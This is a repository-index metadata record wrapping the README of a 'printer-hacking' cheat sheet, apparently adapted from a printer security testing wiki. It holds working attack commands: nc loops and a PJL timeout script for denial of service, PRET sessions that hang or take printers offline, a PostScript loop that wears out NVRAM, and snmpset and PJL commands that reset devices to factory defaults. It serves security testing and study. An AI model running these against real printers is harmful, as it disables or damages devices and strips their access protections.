{"id":18078399,"url":"https://github.com/techgaun/printer-hacking","last_synced_at":"2026-01-19T13:01:52.842Z","repository":{"id":147049011,"uuid":"80890884","full_name":"techgaun/printer-hacking","owner":"techgaun","description":"Going through http://hacking-printers.net/","archived":false,"fork":false,"pushed_at":"2017-04-23T19:28:30.000Z","size":8,"stargazers_count":36,"open_issues_count":0,"forks_count":7,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-04-05T20:41:28.108Z","etag":null,"topics":["hacking"],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/techgaun.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-02-04T03:35:40.000Z","updated_at":"2025-03-27T18:46:52.000Z","dependencies_parsed_at":null,"dependency_job_id":"32b1d063-934f-48d8-9234-339c9c687825","html_url":"https://github.com/techgaun/printer-hacking","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/techgaun/printer-hacking","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/techgaun%2Fprinter-hacking","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/techgaun%2Fprinter-hacking/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/techgaun%2Fprinter-hacking/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/techgaun%2Fprinter-hacking/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/techgaun","download_url":"https://codeload.github.com/techgaun/printer-hacking/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/techgaun%2Fprinter-hacking/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28568833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-19T12:50:50.164Z","status":"ssl_error","status_checked_at":"2026-01-19T12:50:42.704Z","response_time":67,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking"],"created_at":"2024-10-31T12:13:53.320Z","updated_at":"2026-01-19T13:01:52.815Z","avatar_url":"https://github.com/techgaun.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# printer-hacking\n\n\u003e Adapted from http://hacking-printers.net/\n\n## Printer Hacking Tools\n\n- [PRET](https://github.com/RUB-NDS/PRET) - Printer Exploitation Toolkit\n- [Praeda](https://github.com/percx/Praeda) - Automated Printer Data Harvesting Tool\n- [PFT \u0026 Hijetter](http://www.phenoelit.org/hp/) - One of the Early Network Printer Exploitation Tools\n- [BeEF](https://github.com/beefproject/beef) - Browser Exploitation Framework that can be used for performing [Cross-site printing](http://hacking-printers.net/wiki/index.php/Cross-site_printing)\n\n## Protocols/Languages\n- [PostScript](http://hacking-printers.net/wiki/index.php/PostScript)\n- [Printer Job Language (PJL)](http://hacking-printers.net/wiki/index.php/PJL)\n- [Simple Network Management Protocol (SNMP)](http://hacking-printers.net/wiki/index.php/SNMP)\n- [TCP](https://en.wikipedia.org/wiki/Transmission_Control_Protocol)\n- [Printer Management Language (PML)](http://hacking-printers.net/wiki/index.php/PML)\n- [Internet Printing Protocol (IPP)](http://hacking-printers.net/wiki/index.php/IPP)\n- [Line Printer Daemon (LPD)](http://hacking-printers.net/wiki/index.php/LPD)\n\n## Typical Steps\n\n- perform [generic network assessment](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html)\n- information gathering with Praeda\n- use the [cheatsheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet) to find and exploit flaws\n- use PRET for fun \u0026 profit\n\n## Cheatsheet\n\n### [Denial of Service](http://hacking-printers.net/wiki/index.php/Denial_of_service)\n\n#### [Transmission Channel](http://hacking-printers.net/wiki/index.php/Transmission_channel)\n\n- TCP Protocol\n- If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time.\n- Setting high timeout value can effectively be used to enhance attack.\n- Simple way with nc: `while true; do nc printer 9100; done`\n- Set maximum timeout value as in following shell script:\n\n```shell\n# get maximum timeout value with PJL\nMAX=\"`echo \"@PJL INFO VARIABLES\" | nc -w3 printer 9100 |\\\n  grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`\"\n# connect and set maximum timeout for current job with PJL\nwhile true; do echo \"@PJL SET TIMEOUT=$MAX\" | nc printer 9100; done\n```\n- With PRET, a sample session to get timeout values would look like below:\n\n```shell\n./pret.py -q printer pjl\nConnection to printer established\n\nWelcome to the pret shell. Type help or ? to list commands.\nprinter:/\u003e env timeout\nTIMEOUT=15 [2 RANGE]\n       5\n       300\n```\n\n#### [Document Processing](http://hacking-printers.net/wiki/index.php/Document_processing)\n\n- sending malicious print job to cause DoS\n- abuse of allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's RIP busy\n- With PS and PJL\n- Commands with PRET and PostScript: `disable`, `hang`\n\n```shell\n./pret.py -q printer ps\nConnection to printer established\n\nWelcome to the pret shell. Type help or ? to list commands.\nprinter:/\u003e hang\nWarning: This command causes an infinite loop rendering the\ndevice useless until manual restart. Press CTRL+C to abort.\nExecuting PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!\n\n./pret.py -q printer ps\nConnection to printer established\n\nWelcome to the pret shell. Type help or ? to list commands.\nprinter:/\u003e disable\nDisabling printing functionality\n```\n\n- Commands with PRET and PJL: `disable`, `offline`\n\n```shell\n./pret.py -q printer pjl\nConnection to printer established\n\nWelcome to the pret shell. Type help or ? to list commands.\nprinter:/\u003e disable\nPrinting functionality: OFF\n\n./pret.py -q printer pjl\nConnection to printer established\n\nWelcome to the pret shell. Type help or ? to list commands.\nprinter:/\u003e offline \"MESSAGE TO DSIPLAY\"\nWarning: Taking the printer offline will prevent yourself and others\nfrom printing or re-connecting to the device. Press CTRL+C to abort.\nTaking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!\n```\n\n#### [Physical Damage](http://hacking-printers.net/wiki/index.php/Physical_damage)\n\n- Using PS and PJL\n- On PRET, both PS and PJL mode support `destroy` command\n- exploiting finite number of rewrites on NVRAM\n- Example PJL: `@PJL DEFAULT COPIES=X` where X is number of copies\n- PostScript example\n\n```\n/counter 0 def\n{ \u003c\u003c /Password counter 16 string cvs\n     /SystemParamsPassword counter 1 add 16 string cvs\n  \u003e\u003e setsystemparams /counter counter 1 add def\n} loop\n```\n\n### [Privilege Escalation](http://hacking-printers.net/wiki/index.php/Privilege_escalation)\n\n#### [Factory Defaults](http://hacking-printers.net/wiki/index.php/Factory_defaults)\n\n- resetting device to factory defaults often opens holes as the factory defaults are usually known/public\n- can usually be done by pressing a special key combination on the printer's control panel\n\n*Using SNMP*\n\n- The Printer-MIB defines the prtGeneralReset Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (powerCycleReset(4)), reset the NVRAM settings (resetToNVRAM(5)) or restore factory defaults (resetToFactoryDefaults(6)) using SNMP.\n- supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server\n- all static IP address configuration will be lost and without DHCP service on network, attacker might not be able to reconnect\n- use SNMP to test this attack : `snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6`\n- Anyone who can send network packets to port 161/udp of the printer device can perform this attack\n\n*Using PML/PJL*\n\n- most likely to only work on HP printers because SNMP can be transformed into its PML representation and embed the request within a legitimate print job on HP printers\n- Example PJL : `@PJL DMCMD ASCIIHEX=\"040006020501010301040106\"`\n- PRET example\n\n```\n./pret.py -q printer pjl\nConnection to printer established\n\nWelcome to the pret shell. Type help or ? to list commands.\nprinter:/\u003e reset\nprinter:/\u003e restart\n```\n\n- Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing can perform this attack.\n\n*Using PostScript*\n\n- `FactoryDefaults` system parameter, a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on\n- Restarting the printer on the other hand can be accomplished by SNMP and PML\n- Restarting with PostScript requires valid password so restart might be easier to get done with SNMP/PML after postscript attack\n- Infinite loop attack via postscript might be an alternative for forcing users to reboot their printers\n- Set Postscript sys params to factory defaults: `\u003c\u003c /FactoryDefaults true \u003e\u003e setsystemparams` and restart the PostScript interpreter and virtual memory with `true 0 startjob systemdict /quit get exec`\n- PRET Example\n\n```\n./pret.py -q printer ps\nConnection to printer established\n\nWelcome to the pret shell. Type help or ? to list commands.\nprinter:/\u003e reset\nprinter:/\u003e restart\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftechgaun%2Fprinter-hacking","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftechgaun%2Fprinter-hacking","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftechgaun%2Fprinter-hacking/lists"}